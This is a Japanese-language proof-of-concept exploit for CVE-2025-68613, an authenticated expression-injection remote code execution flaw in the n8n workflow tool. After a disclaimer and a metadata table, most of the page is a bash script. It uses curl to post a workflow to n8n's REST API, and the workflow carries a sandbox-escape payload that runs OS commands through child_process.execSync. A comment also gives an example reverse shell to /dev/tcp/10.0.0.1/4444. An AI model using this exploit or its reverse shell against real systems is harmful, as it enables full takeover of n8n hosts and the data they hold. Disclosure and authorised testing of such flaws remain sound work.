
CVE-2025-68613の概念実証エクスプロイト:n8nにおける式インジェクションによる認証済みリモートコード実行
n8n ワークフロー自動化ツールにおける重大なリモートコード実行 (CVSS 9.9)
概念実証 – 教育および許可されたセキュリティ研究のみを目的としています
このコードは、教育目的および管理されたラボ環境での許可されたセキュリティテストのためだけに提供されています。
本番システムまたは明示的な書面による許可のないシステムへの不正使用は違法であり、ほとんどの法域でコンピュータ不正使用およびサイバーセキュリティ法に違反します。
使用は自己責任です。著者はいかなる誤用についても責任を負いません。
| 項目 | 詳細 |
|---|
| エクスプロイトタイトル | n8n Authenticated Expression Injection Remote Code Execution |
| CVE | CVE-2025-68613 |
| 開示日 | 2025-12-25 |
| 著者 | Mohammed Idrees Banyamer |
| 著者の国 | ヨルダン |
| 連絡先 / ソーシャル | Instagram: @banyamer_security |
| GitHub | mbanyamer |
| ベンダー | n8n.io |
| ソフトウェアリポジトリ | github.com/n8n-io/n8n |
| 影響を受けるバージョン | ≥ 0.211.0 < 1.120.4 |
| 修正済みバージョン | 1.120.4, 1.121.1, 1.122.0 以上 |
| テスト環境 | n8n 1.119.3 (Docker) |
| 脆弱性の種類 | 式サンドボックスエスケープによる認証済みリモートコード実行 |
| CVSS スコア | 9.9 (重大) |
この脆弱性により、認証済みユーザーが n8n の式サンドボックスをバイパスする悪意のある式を使用してワークフローを作成または変更でき、n8n プロセスの権限で完全な OS コマンド実行が可能になります。
#!/bin/bash
# Exploit Title: n8n Authenticated Expression Injection RCE
# Date: 2025-12-25
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://n8n.io
# Software Link: https://github.com/n8n-io/n8n
# Version: >=0.211.0 <1.120.4
# Tested on: n8n 1.119.3 (Docker)
# CVE : CVE-2025-68613
TARGET="http://localhost:5678" # ← Change to your target
API_KEY="your_n8n_api_key_here" # ← Insert valid API Key (or use Basic Auth / session)
CMD="id" # ← Test command
# Example reverse shell: "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"
echo "[*] Sending malicious workflow to ${TARGET}"
curl -s -X POST "${TARGET}/rest/workflows" \
-H "Content-Type: application/json" \
-H "X-N8N-API-KEY: ${API_KEY}" \
-d '{
"name": "CVE-2025-68613 PoC",
"active": false,
"nodes": [
{
"parameters": {
"values": {
"string": [
{
"name": "result",
"value": "'${PAYLOAD}'"
}
]
}
},
"name": "Exploit",
"type": "n8n-nodes-base.set",
"typeVersion": 1,
"position": [460, 300]
}
],
"connections": {}
}'
echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"